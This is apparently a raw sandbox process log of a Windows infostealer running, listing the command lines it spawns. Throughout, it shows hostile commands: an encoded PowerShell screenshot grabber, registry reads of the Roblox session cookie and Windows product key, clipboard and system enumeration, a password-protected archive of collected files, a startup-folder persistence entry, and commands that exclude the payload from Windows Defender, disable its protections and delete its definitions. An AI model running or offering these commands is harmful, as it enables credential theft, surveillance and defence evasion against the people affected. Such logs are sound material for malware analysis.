dAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bff1sub3\bff1sub3.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES583D.tmp" "c:\Users\Admin\AppData\Local\Temp\bff1sub3\CSCC6073E208C184680B330A4B506AA246.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33362\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\NZeRY.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI33362\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI33362\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\NZeRY.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Users\Admin\AppData\Local\Temp\bound.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2408_133633184557991593\loader.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
main.exe
C:\Users\Admin\AppData\Local\Temp\onefile_5868_133633184564038664\main.exe
main.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwA